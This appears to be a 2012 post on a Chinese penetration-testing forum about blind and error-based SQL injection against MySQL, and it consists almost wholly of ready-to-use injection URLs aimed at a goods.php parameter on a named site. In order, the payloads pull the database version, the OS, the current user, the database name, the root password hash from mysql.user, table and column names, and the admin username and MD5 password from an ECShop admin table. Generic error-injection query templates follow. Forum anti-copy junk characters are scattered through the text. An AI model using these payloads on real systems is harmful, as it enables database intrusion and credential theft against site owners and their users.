中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
! U, N! }- k* Y* `) o, s$ ]) Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 x- E* h# ^/ ?( T

& |$ @1 R% Q: {! N判断系统
9 v/ [8 y; i2 o: J, u: n* H% L! a8 `( _: _& z! T% ]& e, \, p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- F# C* }6 ?3 Y. i2 p" N. X4 h
" \; H# p+ l. l+ A2 t
! o" g" Q7 b  ^$ Q5 M2 o! b* W
) @( ~; U( M0 b: O当前 user()
4 ^9 j4 c& N1 R6 _! t( t3 ?+ N. @. @2 O5 d, U- }$ v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 ]! K3 {! ~! F3 b
- a& M( ^6 ^3 s1 |! @; u7 K3 n- Q- v
1 \' n% K( y# c7 t* W% E( O

$ f7 X/ o' B8 w: p0 I+ t当前 database()
, P  K6 w2 ?& q7 n. \& Phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 d6 {  r% D3 e" B
. }7 P0 Y+ F5 I1 L" E  U. ]

& k/ V5 o( r: o1 {8 w9 {) z* w5 i, b- {
) ~& h3 z2 A/ a/ t) r
root hash
9 o: I( M: a1 D( e4 ?- {+ ?" O9 U; W: `, t. }. B3 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, R  D0 X/ z# E9 K
- c4 ^6 Q6 b( u/ G4 \
1 M% f4 f. p7 P' j: G! R3 @- O8 S4 Q, i4 w: J0 `
当前 数据库表名' f) @7 G, C, w7 n7 _0 C$ P4 p
: c" _! I9 \) T0 e2 O$ O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 L0 c; J4 ?. C6 W6 w$ z6 \9 H
7 j6 z- B( Y! ]' t* K& t* G1 B( E* z
* s9 Y8 E' v6 m) ?" E; s
当前 数据库 user_name 字段
2 N; r# {  O3 c1 F+ ~2 B$ f5 f! I; S# C/ z7 p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  q( c. K6 ]9 V- h- H

2 D: @) p6 `1 W- @3 q; }3 e5 S当前 数据库 字段 password
$ [' u* |2 b, u  j# t2 X5 t- }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) A' j( m8 b4 y4 x! G5 p4 @9 h9 W

7 ?9 T, |3 z# d! x* D. _# ^1 M
9 B3 h% U6 l. V' C) ~
获得 admin passwd(md5)
* [' ~; E# ~. a) |9 T! L# J# f" r4 |% y8 y
4 {8 \% `3 Z9 K% p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ E+ Y7 M2 {% c

* d8 H, B  _4 m报错注射
, m! W! ^9 r% X, L8 |- M5 NSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 \- R5 j6 x2 z- Z: o7 p( ^. W$ k+ }5 b% ~3 B3 `: g8 k3 H: a
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)- s; h$ n( t/ x% F" [7 H: F
0 j5 z. |$ c! P- F, U* z
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2